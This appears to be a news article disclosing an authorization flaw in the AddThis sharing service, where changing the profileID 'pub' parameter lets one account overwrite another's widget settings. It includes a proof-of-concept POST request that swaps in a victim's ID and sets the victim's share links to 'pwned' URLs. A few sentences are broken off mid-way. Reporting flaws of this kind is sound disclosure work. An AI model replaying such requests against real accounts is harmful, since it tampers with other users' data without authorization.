The Italian security expert Federico Fazzi has discovered a serious vulnerability in the Addthis.com service that allows attackers to take control of any Addthis account. AddThis is the world’s largest content sharing and social insights platform, it prvides a suite of free website plugins to add like, share and follow buttons to any website.
Federico was adding it to his wensite when decide to perform some tests to verify is the usage of the popular plugin is secure. The researcher analyzed a few HTTP requests, his attention was mainly focused on the manipulation of the profileID parameter which is visible in the source code (e.g. ra-XXXXXXXXXXXXXXXX ). Federico noticed that it was possible to use any profileID and atc as the associate account.
Proof of Concept:
User_X = ra-5438e922313abc3a attacker
User_Y = ra-538ce0c960e04da4 victim
ra-XXXXXXXXXXXXXXXX reference to User ProfileId
Example POST Request Header
Remote Address:220.127.116.11:443 Request URL:https://www.addthis.com/meta-data/boost-create-widget Request Method:POST Status Code:200 OK Request Headersview parsed POST /meta-data/boost-create-widget HTTP/1.1 Host: www.addthis.com Connection: keep-alive Content-Length: 1070 Pragma: no-cache Cache-Control: no-cache Accept: */* [..]
pub:ra-538ce0c960e04da4 // (User_X) ra-5438e922313abc3a => (User_Y) ra-538ce0c960e04da4 template:_default widget[enabled]:true widget[title]:Follow widget[size]:large widget[orientation]:vertical widget[elements]:.addthis_vertical_follow_toolbox widget[id]:flwv widget[services][id]:pwned widget[services][service]:facebook widget[services][svc]:facebook widget[services][name]:Facebook widget[services][url]:http://www.facebook.com/pwned widget[services][id]:pwned widget[services][service]:twitter widget[services][svc]:twitter widget[services][name]:Twitter widget[services][url]:http://twitter.com/intent/follow?source=followbutton&variant=1.0&screen_name=pwned widget[services][id]:pwned widget[services][service]:linkedin widget[services][svc]:linkedin widget[services][name]:LinkedIn widget[services][url]:http://www.linkedin.com/in/pwned
Now User_X receives a
While in, the User_Y website plugin data get updated with pwned property value submitted by the User_X.
Note that, a malicious user can perform any request through vulnerable user pub property id value. In addition, the website Addthis.com is devoid largely of controls CSRF for this reason there’s no proof of concept, It is really clear..
Federico Fazzi (aka eurialo)
Linux, Security and Bitcoin enthusiast, hacktivist and security researcher.
(Security Affairs – AddThis, hacking)